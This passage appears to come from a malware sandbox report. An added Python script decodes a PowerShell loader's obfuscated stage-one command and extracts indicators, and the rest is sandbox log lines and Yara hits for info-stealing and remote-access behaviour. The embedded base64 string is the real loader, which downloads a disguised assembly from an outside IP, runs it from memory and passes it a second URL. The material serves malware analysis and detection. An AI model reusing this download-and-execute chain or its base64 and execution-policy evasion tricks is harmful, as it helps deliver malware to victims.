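The wscript.exe to powershell.exe chain above is a two-stage loader. Stage one carries the real command as a base64 string of UTF-16LE text in which the letter U has been swapped for '???' (as the report renders it), restores it with .replace('???','U'), decodes it with [System.Text.Encoding]::Unicode.GetString and hands the result to a second, hidden powershell.exe. Stage two fetches a file with a .pdf name, base64-decodes it into a .NET assembly, loads it from memory with [System.AppDomain]::CurrentDomain.Load and invokes the Run method of type ddscfIvqgW.HoNYlDROLP with a single string argument written backwards. The Python below is an added example, not the sample's or the sandbox's code: it replays the stage-one decoding offline on the string copied from the command line above and pulls out the indicators an analyst wants from stage two (download URL, entry type and method, the argument and its reversal, and whether an assembly is loaded from memory). Reversing the argument gives http://2.56.57.22/tsdfguhijk.txt; the page does not show what the loaded assembly does with it, so treat it as a candidate indicator rather than a confirmed callback. Note also that both stages spell the execution policy 'Bypss'; detection content keyed on the literal string 'Bypass' would not match this command line, which is why the example extracts indicators from the decoded payload instead.

```python
import base64
import binascii
import re

# Stage-one payload copied from the wscript.exe -> powershell.exe command line in the
# report above. The '???' placeholders are part of the sample as the report renders it;
# the script restores them with .replace('???','U') before base64-decoding.
STAGE1_B64 = (
    "WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABb"
    "AFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBG"
    "AHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4A"
    "RABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsA"
    "WwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4A"
    "RwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4A"
    "RwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA="
)


def decode_stage1(b64: str, placeholder: str = "???", fill: str = "U") -> str:
    """Replay $iUqm.replace('???','U'), FromBase64String and Encoding.Unicode.GetString.

    .NET's Encoding.Unicode is UTF-16LE, so the decoded bytes are read as UTF-16LE.
    validate=True makes a leftover placeholder fail loudly instead of being skipped.
    """
    restored = b64.replace(placeholder, fill)
    return base64.b64decode(restored, validate=True).decode("utf-16-le")


def decodes_cleanly(b64: str, placeholder: str = "???", fill: str = "U") -> bool:
    """True when the string is valid base64 after the placeholder substitution."""
    try:
        decode_stage1(b64, placeholder, fill)
        return True
    except (binascii.Error, UnicodeDecodeError):
        return False


# Patterns for the stage-two constructs seen in the decoded command.
IOC_PATTERNS = {
    "download_url": re.compile(r"\.DownloadString\('([^']+)'\)"),
    "entry_type": re.compile(r"\.GetType\('([^']+)'\)"),
    "entry_method": re.compile(r"\.GetMethod\('([^']+)'\)"),
    "raw_argument": re.compile(r"\.Invoke\(\$null,\s*\[object\[\]\]\s*\('([^']+)'\)\)"),
}


def extract_iocs(stage2: str) -> dict:
    """Pull download URL, entry point and argument out of the decoded stage-two command."""
    iocs = {name: (m.group(1) if (m := pat.search(stage2)) else None)
            for name, pat in IOC_PATTERNS.items()}
    arg = iocs["raw_argument"]
    # The loader passes the string backwards; undo that so it can be compared against
    # URL indicators. What the assembly does with it is not shown in the report.
    iocs["argument_reversed"] = arg[::-1] if arg else None
    iocs["loads_assembly_from_memory"] = "AppDomain]::CurrentDomain.Load(" in stage2
    return iocs


if __name__ == "__main__":
    stage2 = decode_stage1(STAGE1_B64)
    print(stage2)
    for name, value in extract_iocs(stage2).items():
        print(f"{name}: {value}")
```

Because the placeholder substitution happens before base64 decoding, any tool that base64-decodes the command line as it appears on disk, without applying the replace, gets a decode error or garbage; that is the point of the '???' trick, and decodes_cleanly shows both outcomes.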
Source: explorer.exe, 0000000A.00000000.609946984.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.475258869.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.538172691.0000000006100000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.609946984.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.475258869.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.474834868.0000000000E38000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.609946984.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.475258869.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.528330036.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: YProgram Managerf
Source: explorer.exe, 0000000A.00000000.609946984.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.475258869.0000000001430000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000000.528330036.0000000001430000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 9.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 24.0.RegAsm.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000017.00000002.956304495.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.503018278.0000012FD8224000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.593036972.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.573682986.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000000.468889612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.552581892.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.522677927.000000000F00A000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.955473010.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000015.00000002.610838072.00000282491DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.502402216.0000012FD8108000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.588308493.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY